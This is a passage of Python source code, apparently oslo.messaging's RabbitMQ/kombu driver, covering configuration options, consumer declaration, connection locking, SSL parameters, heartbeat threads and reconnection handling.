help="Run the health check heartbeat thread "
"through a native python thread by default. If this "
"option is equal to False then the health check "
"heartbeat will inherit the execution model "
"from the parent process. For "
"example if the parent process has monkey patched the "
"stdlib by using eventlet/greenlet then the heartbeat "
"will be run through a green thread.",
deprecated_for_removal=True),
cfg.FloatOpt('kombu_reconnect_delay',
default=1.0,
deprecated_group='DEFAULT',
help='How long to wait before reconnecting in response to an '
'AMQP consumer cancel notification.'),
cfg.StrOpt('kombu_compression',
help="EXPERIMENTAL: Possible values are: gzip, bz2. If not "
"set compression will not be used. This option may not "
"be available in future versions."),
cfg.IntOpt('kombu_missing_consumer_retry_timeout',
deprecated_name="kombu_reconnect_timeout",
default=60,
               help='How long to wait for a missing client before abandoning '
                    'sending it its replies. This value should not be longer '
'than rpc_response_timeout.'),
cfg.StrOpt('kombu_failover_strategy',
choices=('round-robin', 'shuffle'),
default='round-robin',
help='Determines how the next RabbitMQ node is chosen in case '
'the one we are currently connected to becomes '
'unavailable. Takes effect only if more than one '
'RabbitMQ node is provided in config.'),
cfg.StrOpt('rabbit_login_method',
choices=('PLAIN', 'AMQPLAIN', 'RABBIT-CR-DEMO'),
default='AMQPLAIN',
deprecated_group='DEFAULT',
help='The RabbitMQ login method.'),
cfg.IntOpt('rabbit_retry_interval',
default=1,
help='How frequently to retry connecting with RabbitMQ.'),
cfg.IntOpt('rabbit_retry_backoff',
default=2,
deprecated_group='DEFAULT',
help='How long to backoff for between retries when connecting '
'to RabbitMQ.'),
cfg.IntOpt('rabbit_interval_max',
default=30,
help='Maximum interval of RabbitMQ connection retries. '
'Default is 30 seconds.'),
cfg.BoolOpt('rabbit_ha_queues',
default=False,
deprecated_group='DEFAULT',
help='Try to use HA queues in RabbitMQ (x-ha-policy: all). '
'If you change this option, you must wipe the RabbitMQ '
'database. In RabbitMQ 3.0, queue mirroring is no longer '
'controlled by the x-ha-policy argument when declaring a '
'queue. If you just want to make sure that all queues (except '
'those with auto-generated names) are mirrored across all '
'nodes, run: '
"""\"rabbitmqctl set_policy HA '^(?!amq\\.).*' """
"""'{"ha-mode": "all"}' \""""),
cfg.IntOpt('rabbit_transient_queues_ttl',
min=1,
default=1800,
help='Positive integer representing duration in seconds for '
'queue TTL (x-expires). Queues which are unused for the '
'duration of the TTL are automatically deleted. The '
'parameter affects only reply and fanout queues.'),
cfg.IntOpt('rabbit_qos_prefetch_count',
default=0,
help='Specifies the number of messages to prefetch. Setting to '
'zero allows unlimited messages.'),
cfg.IntOpt('heartbeat_timeout_threshold',
default=60,
help="Number of seconds after which the Rabbit broker is "
"considered down if heartbeat's keep-alive fails "
"(0 disables heartbeat)."),
cfg.IntOpt('heartbeat_rate',
default=2,
               help='How many times during the heartbeat_timeout_threshold '
'we check the heartbeat.'),
cfg.BoolOpt('direct_mandatory_flag',
default=True,
deprecated_for_removal=True,
deprecated_reason='Mandatory flag no longer deactivable.',
                help='(DEPRECATED) Enable/Disable the RabbitMQ mandatory '
                     'flag for direct send. The direct send is used as reply, '
                     'so the MessageUndeliverable exception is raised '
                     'in case the client queue does not exist. '
                     'The MessageUndeliverable exception will be used to loop '
                     'for a timeout to give the sender a chance to recover. '
                     'This flag is deprecated and it will not be possible to '
                     'deactivate this functionality anymore.'),
cfg.BoolOpt('enable_cancel_on_failover',
default=False,
help="Enable x-cancel-on-ha-failover flag so that "
"rabbitmq server will cancel and notify consumers"
"when queue is down")
]
LOG = logging.getLogger(__name__)
def _get_queue_arguments(rabbit_ha_queues, rabbit_queue_ttl):
"""Construct the arguments for declaring a queue.
If the rabbit_ha_queues option is set, we try to declare a mirrored queue
as described here:
http://www.rabbitmq.com/ha.html
Setting x-ha-policy to all means that the queue will be mirrored
to all nodes in the cluster. In RabbitMQ 3.0, queue mirroring is
no longer controlled by the x-ha-policy argument when declaring a
queue. If you just want to make sure that all queues (except those
with auto-generated names) are mirrored across all nodes, run:
rabbitmqctl set_policy HA '^(?!amq\\.).*' '{"ha-mode": "all"}'
If the rabbit_queue_ttl option is > 0, then the queue is
declared with the "Queue TTL" value as described here:
https://www.rabbitmq.com/ttl.html
Setting a queue TTL causes the queue to be automatically deleted
if it is unused for the TTL duration. This is a helpful safeguard
to prevent queues with zero consumers from growing without bound.
"""
args = {}
if rabbit_ha_queues:
args['x-ha-policy'] = 'all'
if rabbit_queue_ttl > 0:
args['x-expires'] = rabbit_queue_ttl * 1000
return args
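# For illustration (values assumed, not taken from any real deployment):
# _get_queue_arguments(rabbit_ha_queues=True, rabbit_queue_ttl=1800) returns
# {'x-ha-policy': 'all', 'x-expires': 1800000}, i.e. the queue TTL is passed
# to RabbitMQ in milliseconds.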
class RabbitMessage(dict):
def __init__(self, raw_message):
super(RabbitMessage, self).__init__(
rpc_common.deserialize_msg(raw_message.payload))
LOG.trace('RabbitMessage.Init: message %s', self)
self._raw_message = raw_message
def acknowledge(self):
LOG.trace('RabbitMessage.acknowledge: message %s', self)
self._raw_message.ack()
def requeue(self):
LOG.trace('RabbitMessage.requeue: message %s', self)
self._raw_message.requeue()
class Consumer(object):
"""Consumer class."""
def __init__(self, exchange_name, queue_name, routing_key, type, durable,
exchange_auto_delete, queue_auto_delete, callback,
nowait=False, rabbit_ha_queues=None, rabbit_queue_ttl=0,
enable_cancel_on_failover=False):
"""Init the Consumer class with the exchange_name, routing_key,
        type, durable and auto_delete flags.
"""
self.queue_name = queue_name
self.exchange_name = exchange_name
self.routing_key = routing_key
self.exchange_auto_delete = exchange_auto_delete
self.queue_auto_delete = queue_auto_delete
self.durable = durable
self.callback = callback
self.type = type
self.nowait = nowait
self.queue_arguments = _get_queue_arguments(rabbit_ha_queues,
rabbit_queue_ttl)
self.queue = None
self._declared_on = None
self.exchange = kombu.entity.Exchange(
name=exchange_name,
type=type,
durable=self.durable,
auto_delete=self.exchange_auto_delete)
self.enable_cancel_on_failover = enable_cancel_on_failover
def declare(self, conn):
"""Re-declare the queue after a rabbit (re)connect."""
consumer_arguments = None
if self.enable_cancel_on_failover:
consumer_arguments = {
"x-cancel-on-ha-failover": True}
self.queue = kombu.entity.Queue(
name=self.queue_name,
channel=conn.channel,
exchange=self.exchange,
durable=self.durable,
auto_delete=self.queue_auto_delete,
routing_key=self.routing_key,
queue_arguments=self.queue_arguments,
consumer_arguments=consumer_arguments
)
try:
LOG.debug('[%s] Queue.declare: %s',
conn.connection_id, self.queue_name)
self.queue.declare()
except conn.connection.channel_errors as exc:
# NOTE(jrosenboom): This exception may be triggered by a race
# condition. Simply retrying will solve the error most of the time
# and should work well enough as a workaround until the race
# condition itself can be fixed.
# See https://bugs.launchpad.net/neutron/+bug/1318721 for details.
if exc.code == 404:
self.queue.declare()
else:
raise
except kombu.exceptions.ConnectionError as exc:
# NOTE(gsantomaggio): This exception happens when the
            # connection is established, but it fails to create the queue.
# Add some delay to avoid too many requests to the server.
# See: https://bugs.launchpad.net/oslo.messaging/+bug/1822778
# for details.
if exc.code == 541:
interval = 2
info = {'sleep_time': interval,
'queue': self.queue_name,
'err_str': exc
}
LOG.error('Internal amqp error (541) '
                          'during queue declare, '
'retrying in %(sleep_time)s seconds. '
'Queue: [%(queue)s], '
'error message: [%(err_str)s]', info)
time.sleep(interval)
self.queue.declare()
else:
raise
self._declared_on = conn.channel
def consume(self, conn, tag):
"""Actually declare the consumer on the amqp channel. This will
start the flow of messages from the queue. Using the
Connection.consume() will process the messages,
calling the appropriate callback.
"""
# Ensure we are on the correct channel before consuming
if conn.channel != self._declared_on:
self.declare(conn)
try:
self.queue.consume(callback=self._callback,
consumer_tag=str(tag),
nowait=self.nowait)
except conn.connection.channel_errors as exc:
            # We retry once because of some races from which we can
            # recover before informing the deployer
            # https://bugs.launchpad.net/oslo.messaging/+bug/1581148
            # https://bugs.launchpad.net/oslo.messaging/+bug/1609766
            # https://bugs.launchpad.net/neutron/+bug/1318721
            # The 406 error code relates to messages that are double ack'd
            # At any channel error, RabbitMQ closes
            # the channel, but the amqp-lib quietly re-opens
            # it. So, we must reset all tags and declare
            # all consumers again.
conn._new_tags = set(conn._consumers.values())
if exc.code == 404 or (exc.code == 406 and
exc.method_name == 'Basic.ack'):
self.declare(conn)
self.queue.consume(callback=self._callback,
consumer_tag=str(tag),
nowait=self.nowait)
else:
raise
def cancel(self, tag):
LOG.trace('ConsumerBase.cancel: canceling %s', tag)
self.queue.cancel(str(tag))
def _callback(self, message):
"""Call callback with deserialized message.
        Messages that cannot be processed are rejected.
"""
m2p = getattr(self.queue.channel, 'message_to_python', None)
if m2p:
message = m2p(message)
try:
self.callback(RabbitMessage(message))
except Exception:
LOG.exception("Failed to process message ... skipping it.")
message.reject()
class DummyConnectionLock(_utils.DummyLock):
def heartbeat_acquire(self):
pass
class ConnectionLock(DummyConnectionLock):
"""Lock object to protect access to the kombu connection
This is a lock object to protect access to the kombu connection
object between the heartbeat thread and the driver thread.
    There are two ways to acquire this lock:
    * lock.acquire()
    * lock.heartbeat_acquire()
    In both cases lock.release() releases the lock.
    The goal is that the heartbeat thread always has priority
    for acquiring the lock. This ensures we have no heartbeat
    starvation when the driver sends a lot of messages.
    So when lock.heartbeat_acquire() is called, the next time the lock
    is released the caller unconditionally acquires
    the lock, even if someone else asked for the lock before it.
"""
def __init__(self):
self._workers_waiting = 0
self._heartbeat_waiting = False
self._lock_acquired = None
self._monitor = threading.Lock()
self._workers_locks = threading.Condition(self._monitor)
self._heartbeat_lock = threading.Condition(self._monitor)
self._get_thread_id = eventletutils.fetch_current_thread_functor()
def acquire(self):
with self._monitor:
while self._lock_acquired:
self._workers_waiting += 1
self._workers_locks.wait()
self._workers_waiting -= 1
self._lock_acquired = self._get_thread_id()
def heartbeat_acquire(self):
# NOTE(sileht): must be called only one time
with self._monitor:
while self._lock_acquired is not None:
self._heartbeat_waiting = True
self._heartbeat_lock.wait()
self._heartbeat_waiting = False
self._lock_acquired = self._get_thread_id()
def release(self):
with self._monitor:
if self._lock_acquired is None:
raise RuntimeError("We can't release a not acquired lock")
thread_id = self._get_thread_id()
if self._lock_acquired != thread_id:
raise RuntimeError("We can't release lock acquired by another "
"thread/greenthread; %s vs %s" %
(self._lock_acquired, thread_id))
self._lock_acquired = None
if self._heartbeat_waiting:
self._heartbeat_lock.notify()
elif self._workers_waiting > 0:
self._workers_locks.notify()
@contextlib.contextmanager
def for_heartbeat(self):
self.heartbeat_acquire()
try:
yield
finally:
self.release()
class Connection(object):
"""Connection object."""
def __init__(self, conf, url, purpose):
# NOTE(viktors): Parse config options
driver_conf = conf.oslo_messaging_rabbit
self.interval_start = driver_conf.rabbit_retry_interval
self.interval_stepping = driver_conf.rabbit_retry_backoff
self.interval_max = driver_conf.rabbit_interval_max
self.login_method = driver_conf.rabbit_login_method
self.rabbit_ha_queues = driver_conf.rabbit_ha_queues
self.rabbit_transient_queues_ttl = \
driver_conf.rabbit_transient_queues_ttl
self.rabbit_qos_prefetch_count = driver_conf.rabbit_qos_prefetch_count
self.heartbeat_timeout_threshold = \
driver_conf.heartbeat_timeout_threshold
self.heartbeat_rate = driver_conf.heartbeat_rate
self.kombu_reconnect_delay = driver_conf.kombu_reconnect_delay
self.amqp_durable_queues = driver_conf.amqp_durable_queues
self.amqp_auto_delete = driver_conf.amqp_auto_delete
self.ssl = driver_conf.ssl
self.kombu_missing_consumer_retry_timeout = \
driver_conf.kombu_missing_consumer_retry_timeout
self.kombu_failover_strategy = driver_conf.kombu_failover_strategy
self.kombu_compression = driver_conf.kombu_compression
self.heartbeat_in_pthread = driver_conf.heartbeat_in_pthread
self.enable_cancel_on_failover = driver_conf.enable_cancel_on_failover
if self.heartbeat_in_pthread:
            # NOTE(hberaud): Experimental: the threading module is used to run
            # the rabbitmq health check heartbeat. In some situations, like
            # with nova-api, nova needs green threads to run the cells
            # mechanisms in an async mode, so they use eventlet and
            # greenlet to monkey patch the python stdlib and get green threads.
            # The issue here is that nova-api runs under the apache MPM prefork
            # module and mod_wsgi. The apache prefork module doesn't support
            # epoll and recent kernel features, and eventlet is built over epoll
            # and libevent, so when we run the rabbitmq heartbeat we inherit
            # the execution model of the parent process (nova-api), and
            # in this case we will run the heartbeat through a green thread.
            # We want to allow users to choose between pthread and
            # green threads if needed in some specific situations.
            # This experimental feature allows users to use pthread in an env
            # that doesn't support eventlet, without forcing the parent process
            # to stop using eventlet if it needs monkey patching for some
            # specific reason.
            # If users want to use pthread we need to make sure that we
            # will use the *native* threading module to
            # initialize the heartbeat thread.
            # Here we globally override the previously imported
            # threading module with the native python threading module
            # if it was already monkey patched by eventlet/greenlet.
global threading
threading = stdlib_threading
self.direct_mandatory_flag = driver_conf.direct_mandatory_flag
if self.ssl:
self.ssl_version = driver_conf.ssl_version
self.ssl_key_file = driver_conf.ssl_key_file
self.ssl_cert_file = driver_conf.ssl_cert_file
self.ssl_ca_file = driver_conf.ssl_ca_file
self._url = ''
if url.hosts:
if url.transport.startswith('kombu+'):
LOG.warning('Selecting the kombu transport through the '
                            'transport url (%s) is an experimental feature '
                            'and is not yet supported.',
url.transport)
if len(url.hosts) > 1:
random.shuffle(url.hosts)
transformed_urls = [
self._transform_transport_url(url, host)
for host in url.hosts]
self._url = ';'.join(transformed_urls)
elif url.transport.startswith('kombu+'):
            # NOTE(sileht): url has a + but no hosts
# (like kombu+memory:///), pass it to kombu as-is
transport = url.transport.replace('kombu+', '')
self._url = "%s://" % transport
if url.virtual_host:
self._url += url.virtual_host
elif not url.hosts:
host = oslo_messaging.transport.TransportHost('')
# NOTE(moguimar): default_password in this function's context is
# a fallback option, not a hardcoded password.
# username and password are read from host.
self._url = self._transform_transport_url( # nosec
url, host, default_username='guest', default_password='guest',
default_hostname='localhost')
self._initial_pid = os.getpid()
self._consumers = {}
self._producer = None
self._new_tags = set()
self._active_tags = {}
self._tags = itertools.count(1)
# Set of exchanges and queues declared on the channel to avoid
        # unnecessary redeclaration. This set is reset each time
        # the connection is reset in Connection._set_current_channel
self._declared_exchanges = set()
self._declared_queues = set()
self._consume_loop_stopped = False
self.channel = None
self.purpose = purpose
# NOTE(sileht): if purpose is PURPOSE_LISTEN
# we don't need the lock because we don't
# have a heartbeat thread
if purpose == rpc_common.PURPOSE_SEND:
self._connection_lock = ConnectionLock()
else:
self._connection_lock = DummyConnectionLock()
self.connection_id = str(uuid.uuid4())
self.name = "%s:%d:%s" % (os.path.basename(sys.argv[0]),
os.getpid(),
self.connection_id)
self.connection = kombu.connection.Connection(
self._url, ssl=self._fetch_ssl_params(),
login_method=self.login_method,
heartbeat=self.heartbeat_timeout_threshold,
failover_strategy=self.kombu_failover_strategy,
transport_options={
'confirm_publish': True,
'client_properties': {
'capabilities': {
'authentication_failure_close': True,
'connection.blocked': True,
'consumer_cancel_notify': True
},
'connection_name': self.name},
'on_blocked': self._on_connection_blocked,
'on_unblocked': self._on_connection_unblocked,
},
)
LOG.debug('[%(connection_id)s] Connecting to AMQP server on'
' %(hostname)s:%(port)s',
self._get_connection_info())
        # NOTE(sileht): kombu recommends running heartbeat_check every
        # second, but we use a lock around the kombu connection, and most
        # of the time holding this lock would do nothing except wait for
        # the events to drain. So we start heartbeat_check and retrieve
        # the server heartbeat packet only twice as often as the minimum
        # required for the heartbeat to work
        # (heartbeat_timeout/heartbeat_rate/2.0, default kombu
        # heartbeat_rate is 2).
self._heartbeat_wait_timeout = (
float(self.heartbeat_timeout_threshold) /
float(self.heartbeat_rate) / 2.0)
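        # With the defaults above (heartbeat_timeout_threshold=60,
        # heartbeat_rate=2) this works out to 60 / 2 / 2.0 = 15 seconds
        # between heartbeat checks.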
self._heartbeat_support_log_emitted = False
        # NOTE(sileht): just ensure the connection is set up at startup
with self._connection_lock:
self.ensure_connection()
# NOTE(sileht): if purpose is PURPOSE_LISTEN
# the consume code does the heartbeat stuff
# we don't need a thread
self._heartbeat_thread = None
if purpose == rpc_common.PURPOSE_SEND:
self._heartbeat_start()
LOG.debug('[%(connection_id)s] Connected to AMQP server on '
'%(hostname)s:%(port)s via [%(transport)s] client with'
' port %(client_port)s.',
self._get_connection_info())
        # NOTE(sileht): value chosen according to the best practice from kombu
        # http://kombu.readthedocs.org/en/latest/reference/kombu.common.html#kombu.common.eventloop
        # For heartbeat, we can set a bigger timeout, and check that we
        # receive the heartbeat packets regularly
if self._heartbeat_supported_and_enabled():
self._poll_timeout = self._heartbeat_wait_timeout
else:
self._poll_timeout = 1
if self._url.startswith('memory://'):
# Kludge to speed up tests.
self.connection.transport.polling_interval = 0.0
# Fixup logging
self.connection.hostname = "memory_driver"
self.connection.port = 1234
self._poll_timeout = 0.05
# FIXME(markmc): use oslo sslutils when it is available as a library
_SSL_PROTOCOLS = {
"tlsv1": ssl.PROTOCOL_TLSv1,
"sslv23": ssl.PROTOCOL_SSLv23
}
_OPTIONAL_PROTOCOLS = {
'sslv2': 'PROTOCOL_SSLv2',
'sslv3': 'PROTOCOL_SSLv3',
'tlsv1_1': 'PROTOCOL_TLSv1_1',
'tlsv1_2': 'PROTOCOL_TLSv1_2',
}
for protocol in _OPTIONAL_PROTOCOLS:
try:
_SSL_PROTOCOLS[protocol] = getattr(ssl,
_OPTIONAL_PROTOCOLS[protocol])
except AttributeError:
pass
@classmethod
def validate_ssl_version(cls, version):
key = version.lower()
try:
return cls._SSL_PROTOCOLS[key]
except KeyError:
raise RuntimeError("Invalid SSL version : %s" % version)
# NOTE(moguimar): default_password in this function's context is just
# a fallback option, not a hardcoded password.
def _transform_transport_url(self, url, host, default_username='', # nosec
default_password='', default_hostname=''):
transport = url.transport.replace('kombu+', '')
transport = transport.replace('rabbit', 'amqp')
return '%s://%s:%s@%s:%s/%s' % (
transport,
parse.quote(host.username or default_username),
parse.quote(host.password or default_password),
self._parse_url_hostname(host.hostname) or default_hostname,
str(host.port or 5672),
url.virtual_host or '')
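    # A hedged example of the transformation above (host values made up):
    # a host with username 'user', password 'pass', hostname 'rmq1' and
    # port 5672, with virtual_host 'nova' on a 'rabbit' transport, becomes
    # 'amqp://user:pass@rmq1:5672/nova'.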
def _parse_url_hostname(self, hostname):
"""Handles hostname returned from urlparse and checks whether it's
ipaddress. If it's ipaddress it ensures that it has brackets for IPv6.
"""
return '[%s]' % hostname if ':' in hostname else hostname
def _fetch_ssl_params(self):
"""Handles fetching what ssl params should be used for the connection
(if any).
"""
if self.ssl:
ssl_params = dict()
# http://docs.python.org/library/ssl.html - ssl.wrap_socket
if self.ssl_version:
ssl_params['ssl_version'] = self.validate_ssl_version(
self.ssl_version)
if self.ssl_key_file:
ssl_params['keyfile'] = self.ssl_key_file
if self.ssl_cert_file:
ssl_params['certfile'] = self.ssl_cert_file
if self.ssl_ca_file:
ssl_params['ca_certs'] = self.ssl_ca_file
# We might want to allow variations in the
# future with this?
ssl_params['cert_reqs'] = ssl.CERT_REQUIRED
return ssl_params or True
return False
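    # Sketch of the returned value (file paths are placeholders): with ssl
    # enabled and all files configured, _fetch_ssl_params() returns something
    # like {'keyfile': '/etc/pki/key.pem', 'certfile': '/etc/pki/cert.pem',
    # 'ca_certs': '/etc/pki/ca.pem', 'cert_reqs': ssl.CERT_REQUIRED}, plus
    # 'ssl_version' if one was configured; with ssl enabled but nothing else
    # set it returns True, and with ssl disabled it returns False.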
@staticmethod
def _on_connection_blocked(reason):
LOG.error("The broker has blocked the connection: %s", reason)
@staticmethod
def _on_connection_unblocked():
LOG.info("The broker has unblocked the connection")
def ensure_connection(self):
# NOTE(sileht): we reset the channel and ensure
# the kombu underlying connection works
def on_error(exc, interval):
LOG.error("Connection failed: %s (retrying in %s seconds)",
str(exc), interval)
self._set_current_channel(None)
self.connection.ensure_connection(errback=on_error)
self._set_current_channel(self.connection.channel())
self.set_transport_socket_timeout()
def ensure(self, method, retry=None,
recoverable_error_callback=None, error_callback=None,
timeout_is_error=True):
"""Will retry up to retry number of times.
retry = None or -1 means to retry forever
retry = 0 means no retry
retry = N means N retries
NOTE(sileht): Must be called within the connection lock
"""
current_pid = os.getpid()
if self._initial_pid != current_pid:
LOG.warning("Process forked after connection established! "
"This can result in unpredictable behavior. "
"See: https://docs.openstack.org/oslo.messaging/"
"latest/reference/transport.html")
self._initial_pid = current_pid
if retry is None or retry < 0:
retry = float('inf')
def on_error(exc, interval):
LOG.debug("[%s] Received recoverable error from kombu:"
% self.connection_id,
exc_info=True)
recoverable_error_callback and recoverable_error_callback(exc)
interval = (self.kombu_reconnect_delay + interval
if self.kombu_reconnect_delay > 0
else interval)
info = {'err_str': exc, 'sleep_time': interval}
info.update(self._get_connection_info(conn_error=True))
if 'Socket closed' in str(exc):
LOG.error('[%(connection_id)s] AMQP server'
' %(hostname)s:%(port)s closed'
' the connection. Check login credentials:'
' %(err_str)s', info)
else:
LOG.error('[%(connection_id)s] AMQP server on '
'%(hostname)s:%(port)s is unreachable: '
'%(err_str)s. Trying again in '
'%(sleep_time)d seconds.', info)
# XXX(nic): when reconnecting to a RabbitMQ cluster
# with mirrored queues in use, the attempt to release the
# connection can hang "indefinitely" somewhere deep down
# in Kombu. Blocking the thread for a bit prior to
# release seems to kludge around the problem where it is
            # otherwise reproducible.
# TODO(sileht): Check if this is useful since we
# use kombu for HA connection, the interval_step
            # should be sufficient, because the underlying kombu transport
            # connection object is freed.
if self.kombu_reconnect_delay > 0:
LOG.trace('Delaying reconnect for %1.1f seconds ...',
self.kombu_reconnect_delay)
time.sleep(self.kombu_reconnect_delay)
def on_reconnection(new_channel):
"""Callback invoked when the kombu reconnects and creates
            a new channel; we use it to reconfigure our consumers.
"""
self._set_current_channel(new_channel)
self.set_transport_socket_timeout()
LOG.info('[%(connection_id)s] Reconnected to AMQP server on '
'%(hostname)s:%(port)s via [%(transport)s] client '
'with port %(client_port)s.',
self._get_connection_info())
def execute_method(channel):
self._set_current_channel(channel)
method()
try:
autoretry_method = self.connection.autoretry(
execute_method, channel=self.channel,
max_retries=retry,
errback=on_error,
interval_start=self.interval_start or 1,
interval_step=self.interval_stepping,
interval_max=self.interval_max,
on_revive=on_reconnection)
ret, channel = autoretry_method()
self._set_current_channel(channel)
return ret
except rpc_amqp.AMQPDestinationNotFound:
# NOTE(sileht): we must reraise this without
# trigger error_callback
raise
except exceptions.MessageUndeliverable:
# NOTE(gsantomaggio): we must reraise this without
# trigger error_callback
raise
except Exception as exc:
error_callback and error_callback(exc)
self._set_current_channel(None)
# NOTE(sileht): number of retry exceeded and the connection
# is still broken
info = {'err_str': exc, 'retry': retry}
info.update(self.connection.info())
msg = ('Unable to connect to AMQP server on '
'%(hostname)s:%(port)s after %(retry)s '
'tries: %(err_str)s' % info)
LOG.error(msg)
raise exceptions.MessageDeliveryFailure(msg)
@staticmethod
def on_return(exception, exchange, routing_key, message):
raise exceptions.MessageUndeliverable(exception, exchange, routing_key,
message)
def _set_current_channel(self, new_channel):
"""Change the channel to use.
NOTE(sileht): Must be called within the connection lock
"""
if new_channel == self.channel:
return
if self.channel is not None:
self._declared_queues.clear()
self._declared_exchanges.clear()
self.connection.maybe_close_channel(self.channel)
self.channel = new_channel
if new_channel is not None:
if self.purpose == rpc_common.PURPOSE_LISTEN:
self._set_qos(new_channel)
self._producer = kombu.messaging.Producer(new_channel,
on_return=self.on_return)
for consumer in self._consumers:
consumer.declare(self)
def _set_qos(self, channel):
"""Set QoS prefetch count on the channel"""
if self.rabbit_qos_prefetch_count > 0:
channel.basic_qos(0,
self.rabbit_qos_prefetch_count,
False)
def close(self):
"""Close/release this connection."""
self._heartbeat_stop()
if self.connection:
for consumer in filter(lambda c: c.type == 'fanout',
self._consumers):
LOG.debug('[connection close] Deleting fanout '
'queue: %s ' % consumer.queue.name)
consumer.queue.delete()
self._set_current_channel(None)
self.connection.release()
self.connection = None
def reset(self):
"""Reset a connection so it can be used again."""
with self._connection_lock:
try:
for consumer, tag in self._consumers.items():
consumer.cancel(tag=tag)
except kombu.exceptions.OperationalError:
self.ensure_connection()
self._consumers.clear()
self._active_tags.clear()
self._new_tags.clear()
self._tags = itertools.count(1)
def _heartbeat_supported_and_enabled(self):
if self.heartbeat_timeout_threshold <= 0:
return False
if self.connection.supports_heartbeats:
return True
elif not self._heartbeat_support_log_emitted:
LOG.warning("Heartbeat support requested but it is not "
"supported by the kombu driver or the broker")
self._heartbeat_support_log_emitted = True
return False
def set_transport_socket_timeout(self, timeout=None):
        # NOTE(sileht): there are some cases where the heartbeat check
        # or producer.send returns only when the system socket
        # timeout is reached. kombu doesn't allow us to customise this
        # timeout, so for py-amqp we tweak it ourselves.
# NOTE(dmitryme): Current approach works with amqp==1.4.9 and
# kombu==3.0.33. Once the commit below is released, we should
# try to set the socket timeout in the constructor:
# https://github.com/celery/py-amqp/pull/64
heartbeat_timeout = self.heartbeat_timeout_threshold
if self._heartbeat_supported_and_enabled():
            # NOTE(sileht): we are supposed to send a heartbeat every
            # heartbeat_timeout; no need to wait longer, otherwise the broker
            # will disconnect us, so raise the timeout earlier ourselves
if timeout is None:
timeout = heartbeat_timeout
else:
timeout = min(heartbeat_timeout, timeout)
try:
sock = self.channel.connection.sock
except AttributeError as e:
# Level is set to debug because otherwise we would spam the logs
LOG.debug('[%s] Failed to get socket attribute: %s'
% (self.connection_id, str(e)))
else:
sock.settimeout(timeout)
# TCP_USER_TIMEOUT is not defined on Windows and Mac OS X
if sys.platform != 'win32' and sys.platform != 'darwin':
try:
timeout = timeout * 1000 if timeout is not None else 0
# NOTE(gdavoian): only integers and strings are allowed
# as socket options' values, and TCP_USER_TIMEOUT option
# can take only integer values, so we round-up the timeout
# to the nearest integer in order to ensure that the
# connection is not broken before the expected timeout
sock.setsockopt(socket.IPPROTO_TCP,
TCP_USER_TIMEOUT,
int(math.ceil(timeout)))
except socket.error as error:
code = error[0]
# TCP_USER_TIMEOUT not defined on kernels <2.6.37
if code != errno.ENOPROTOOPT:
raise
@contextlib.contextmanager
def _transport_socket_timeout(self, timeout):
self.set_transport_socket_timeout(timeout)
yield
self.set_transport_socket_timeout()
def _heartbeat_check(self):
# NOTE(sileht): we are supposed to send at least one heartbeat
        # every heartbeat_timeout_threshold, so no need to wait more
self.connection.heartbeat_check(rate=self.heartbeat_rate)
def _heartbeat_start(self):
if self._heartbeat_supported_and_enabled():
self._heartbeat_exit_event = threading.Event()
self._heartbeat_thread = threading.Thread(
target=self._heartbeat_thread_job, name="Rabbit-heartbeat")
self._heartbeat_thread.daemon = True
self._heartbeat_thread.start()
else:
self._heartbeat_thread = None
def _heartbeat_stop(self):
if self._heartbeat_thread is not None:
self._heartbeat_exit_event.set()
self._heartbeat_thread.join()
self._heartbeat_thread = None
def _heartbeat_thread_job(self):
"""Thread that maintains inactive connections
"""
while not self._heartbeat_exit_event.is_set():
with self._connection_lock.for_heartbeat():
try:
try:
self._heartbeat_check()
                        # NOTE(sileht): We need to drain events to receive
                        # heartbeats from the broker but not hold the
                        # connection for too long. In amqpdriver a connection
                        # is used exclusively for read or for write, so we
                        # have to do this for connections used for write;
                        # drain_events already does that for other connections.
try:
self.connection.drain_events(timeout=0.001)
except socket.timeout:
pass
                    # NOTE(hberaud): In a clustered rabbitmq, when
                    # a node disappears, we get a ConnectionRefusedError
                    # because the socket gets disconnected.
                    # The socket access yields an OSError because the heartbeat
                    # tries to reach an unreachable host (No route to host).
                    # Catch these exceptions to ensure that we call
                    # ensure_connection to switch the
                    # connection destination.
except (socket.timeout,
ConnectionRefusedError,
OSError,
kombu.exceptions.OperationalError,
amqp_exec.ConnectionForced) as exc:
LOG.info("A recoverable connection/channel error "
"occurred, trying to reconnect: %s", exc)
self.ensure_connection()
except Exception:
LOG.warning("Unexpected error during heartbeat "
"thread processing, retrying...")
LOG.debug('Exception', exc_info=True)
self._heartbeat_exit_event.wait(
timeout=self._heartbeat_wait_timeout)
self._heartbeat_exit_event.clear()
def declare_consumer(self, consumer):
"""Create a Consumer using the class that was passed in and
add it to our list of consumers
"""
def _connect_error(exc):
log_info = {'topic': consumer.routing_key, 'err_str': exc}
LOG.error("Failed to declare consumer for topic '%(topic)s': "
"%(err_str)s", log_info)
def _declare_consumer():
consumer.declare(self)
tag = self._active_tags.get(consumer.queue_name)
if tag is None:
tag = next(self._tags)
self._active_tags[consumer.queue_name] = tag
self._new_tags.add(tag)
self._consumers[consumer] = tag
return consumer
with self._connection_lock:
return self.ensure(_declare_consumer,
error_callback=_connect_error)
def consume(self, timeout=None):
"""Consume from all queues/consumers."""
timer = rpc_common.DecayingTimer(duration=timeout)
timer.start()
def _raise_timeout():
raise rpc_common.Timeout()
def _recoverable_error_callback(exc):
if not isinstance(exc, rpc_common.Timeout):
self._new_tags = set(self._consumers.values())
timer.check_return(_raise_timeout)
def _error_callback(exc):
_recoverable_error_callback(exc)
LOG.error('Failed to consume message from queue: %s', exc)
def _consume():
            # NOTE(sileht): in case the acknowledgment or requeue of a
            # message fails, the kombu transport can be disconnected.
            # In this case, we must redeclare our consumers, so raise
            # a recoverable error to trigger the reconnection code.
if not self.connection.connected:
raise self.connection.recoverable_connection_errors[0]
while self._new_tags:
for consumer, tag in self._consumers.items():
if tag in self._new_tags:
consumer.consume(self, tag=tag)
self._new_tags.remove(tag)
poll_timeout = (self._poll_timeout if timeout is None
else min(timeout, self._poll_timeout))
while True:
if self._consume_loop_stopped:
return
if self._heartbeat_supported_and_enabled():
self._heartbeat_check()
try:
self.connection.drain_events(timeout=poll_timeout)
return
except socket.timeout:
poll_timeout = timer.check_return(
_raise_timeout, maximum=self._poll_timeout)
except self.connection.channel_errors as exc:
if exc.code == 406 and exc.method_name == 'Basic.ack':
                        # NOTE(gordc): occasionally multiple workers will grab
                        # the same message and acknowledge it. If that
                        # happens, meh.
raise self.connection.recoverable_channel_errors[0]
raise
with self._connection_lock:
self.ensure(_consume,
recoverable_error_callback=_recoverable_error_callback,
error_callback=_error_callback)
def stop_consuming(self):
self._consume_loop_stopped = True
